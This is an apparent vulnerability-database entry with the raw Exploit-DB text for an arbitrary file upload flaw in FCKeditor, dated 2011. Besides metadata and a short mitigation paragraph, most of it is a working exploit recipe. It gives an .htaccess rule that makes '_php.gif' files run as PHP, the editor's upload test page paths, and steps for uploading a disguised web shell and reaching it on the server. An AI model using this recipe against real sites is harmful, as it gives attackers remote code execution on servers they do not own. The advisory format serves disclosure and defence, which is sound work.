FCKeditor all version Arbitrary File Upload Vulnerability

vendor:

FCKeditor

by:

pentesters.ir

9.3

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: FCKeditor

Affected Version From: All versions

Affected Version To: All versions

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: All

2011

FCKeditor all version Arbitrary File Upload Vulnerability

An attacker can upload a malicious file with a .gif extension and a malicious code inside it, and then rename it to a .php.gif extension. This will allow the attacker to execute arbitrary code on the server.

Mitigation:

Ensure that the application is configured to only allow the upload of files with the appropriate file extensions and that the application is configured to validate the contents of the uploaded files.

Source

Exploit-DB raw data:

In The Name Of GOD 
[+] Title:FCKeditor all version Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] script:http://sourceforge.net/projects/fckeditor/
[+] Author  : pentesters.ir
[+] Website : WwW.PenTesters.IR
---------------------------------------------------------
1.create a htaccess file:
code: 
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2.Now upload this htaccess with FCKeditor.
http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
----------------------------------------------------------------------------------------------
3.Now upload shell.php.gif with FCKeditor.
4.After upload shell.php.gif, the name "shell.php.gif" change to "shell_php.gif" automatically.
5.http://target.com/anything/shell_php.gif
6.Now shell is available from server.
---------------------------------------------------------